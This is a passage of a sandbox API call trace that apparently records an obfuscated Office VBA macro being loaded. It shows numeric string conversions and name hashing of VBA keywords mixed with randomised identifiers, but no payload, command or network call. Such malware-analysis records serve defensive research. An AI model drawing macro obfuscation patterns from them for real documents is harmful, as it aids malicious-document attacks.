strIn="282335386", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="153352851", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="182660910", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="846934334", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="774081141", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="942541346", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="443495128", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="143539225", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="584749432", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] CExposedStream::Read () returned 0x0 [0067.876] CExposedStream::Read () returned 0x0 [0067.876] VarI4FromStr (in: strIn="628938340", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.876] VarI4FromStr (in: strIn="927788245", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.877] VarI4FromStr (in: strIn="999705328", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.877] strcpy_s (in: _Dst=0x7fee3b5efc0, _DstSize=0x100, _Src="MAUAAD" | out: _Dst="MAUAAD") returned 0x0 [0067.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.877] IMalloc:Realloc (This=0x7fefec05380, pv=0xafc5230, cb=0x9000) returned 0xafc9a40 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lAxoCADU") returned 0x100ce1 [0067.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nAcAAAXA") returned 0x10ae97 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAQAZCX") returned 0x104bdb [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zUQBAcDA") returned 0x104ad3 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rA4AAAxA") returned 0x104d4b [0067.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tABUGU1A") returned 0x10f9e3 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="R_UGAAUA") returned 0x10ef59 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zx4xUA") returned 0x101d92 [0067.878] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="VB_Creatable", cchCount1=-1, lpString2="zx4xUA", cchCount2=-1) returned 1 [0067.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wkAwkAAA") returned 0x109284 [0067.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mZUoAoA1") returned 0x109b96 [0067.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sABAAxGG") returned 0x1003f9 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="b4ACDw") returned 0x100f6d [0067.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i_AAwX4") returned 0x108e80 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NQGQCA") returned 0x1093d6 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LUXwxBA") returned 0x10cd50 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bAQAcZwc") returned 0x100453 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EZA_BQA") returned 0x10ec02 [0067.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="N4AAA_cc") returned 0x10e979 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hBAUAAc") returned 0x10d212 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iA_ZQB") returned 0x10be21 [0067.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ODGCA_") returned 0x10f6d1 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bAAAGAA") returned 0x10eb78 [0067.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.879] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="W4_XADwA") returned 0x101621 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cAUAGZA") returned 0x108d35 [0067.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LAB1BAw") returned 0x1075e8 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VA1ZB1D") returned 0x10d9ca [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="U1Akc4_") returned 0x10c616 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.880] CExposedStream::Read () returned 0x0 [0067.880] CExposedStream::Read () returned 0x0 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aUAADAQ") returned 0x1059a6 [0067.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.880] VarI4FromStr (in: strIn="687814716", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZZQ1AZ") returned 0x10d2f1 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="c_AZACC") returned 0x10fa3d [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hB44CUDB") returned 0x10282a [0067.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.880] VarI4FromStr (in: strIn="420199478", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.880] VarI4FromStr (in: strIn="390270315", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.880] VarI4FromStr (in: strIn="601979136", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.880] VarI4FromStr (in: strIn="964903255", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.880] VarI4FromStr (in: strIn="971230458", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WDUAAcZA") returned 0x10ff51 [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="w_wxGX") returned 0x10ff5d [0067.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.881] VarI4FromStr (in: strIn="883007328", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] VarI4FromStr (in: strIn="298950011", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAAQDU") returned 0x103489 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.881] VarI4FromStr (in: strIn="461186111", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] VarI4FromStr (in: strIn="9540883", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.881] VarI4FromStr (in: strIn="98940388", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] VarI4FromStr (in: strIn="708210475", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.881] VarI4FromStr (in: strIn="450629228", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OAABQACA") returned 0x106b74 [0067.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.881] VarI4FromStr (in: strIn="927429580", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ACkAQXU") returned 0x10ccbd [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAX4BBA") returned 0x10d19a [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="woAAcCUB") returned 0x106a12 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qAD4cA") returned 0x10cd70 [0067.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.881] VarI4FromStr (in: strIn="806585588", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="toDQZDD") returned 0x10fc2b [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ccxCAA1Q") returned 0x102179 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zUAUAQCA") returned 0x10feec [0067.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.882] VarI4FromStr (in: strIn="247117333", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] VarI4FromStr (in: strIn="192714449", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] VarI4FromStr (in: strIn="195708775", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] VarI4FromStr (in: strIn="255585567", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] VarI4FromStr (in: strIn="748721053", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VABkAA4c") returned 0x103b76 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XABZBA_A") returned 0x109564 [0067.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.882] VarI4FromStr (in: strIn="41002540", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] VarI4FromStr (in: strIn="380228143", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JDxQAkQ") returned 0x107620 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.882] VarI4FromStr (in: strIn="589561268", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] VarI4FromStr (in: strIn="301386026", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.882] VarI4FromStr (in: strIn="221451798", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] VarI4FromStr (in: strIn="534694120", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.882] VarI4FromStr (in: strIn="245590683", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XUAZDAAU") returned 0x10e1f4 [0067.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.882] VarI4FromStr (in: strIn="288056569", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HGoAAU") returned 0x103032 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sZDwZZwx") returned 0x109778 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iQxBQXX") returned 0x102749 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aCAA1Zk") returned 0x106ed5 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mQAA_QC") returned 0x107efb [0067.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.883] VarI4FromStr (in: strIn="458831567", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YcxcAAAA") returned 0x101087 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TGAAQ_") returned 0x107374 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAxkDGD") returned 0x100d5c [0067.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.883] VarI4FromStr (in: strIn="397574552", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] VarI4FromStr (in: strIn="953603716", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] VarI4FromStr (in: strIn="505934443", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] VarI4FromStr (in: strIn="299758287", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] VarI4FromStr (in: strIn="478434691", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IUADZc") returned 0x1085db [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GUQCXA") returned 0x10ada6 [0067.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.883] VarI4FromStr (in: strIn="465405382", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] VarI4FromStr (in: strIn="111086961", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mUBUAD") returned 0x10fd9e [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.883] VarI4FromStr (in: strIn="624281273", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] VarI4FromStr (in: strIn="354618338", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.884] VarI4FromStr (in: strIn="895389447", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] VarI4FromStr (in: strIn="421455516", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.884] VarI4FromStr (in: strIn="307499806", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="t_1QAAA") returned 0x100ca8 [0067.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.884] VarI4FromStr (in: strIn="952535242", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lXADA_") returned 0x107c25 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FAAAoABQ") returned 0x10482e [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TZxACC4") returned 0x1085fd [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAAQAQ") returned 0x108881 [0067.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.884] VarI4FromStr (in: strIn="553188407", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EBw_AAA") returned 0x10bbe4 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wDCwAcA") returned 0x1046a8 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VAACAUcA") returned 0x100271 [0067.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.884] VarI4FromStr (in: strIn="388498515", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] VarI4FromStr (in: strIn="782601162", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] VarI4FromStr (in: strIn="733036474", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] VarI4FromStr (in: strIn="859908833", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] VarI4FromStr (in: strIn="384576995", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JAAAAw") returned 0x1022ad [0067.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mBGAwU") returned 0x109dd7 [0067.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.885] VarI4FromStr (in: strIn="686643024", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] VarI4FromStr (in: strIn="334754287", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jAoBkAB_") returned 0x1003a8 [0067.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.885] VarI4FromStr (in: strIn="474008132", lcid=0x409, 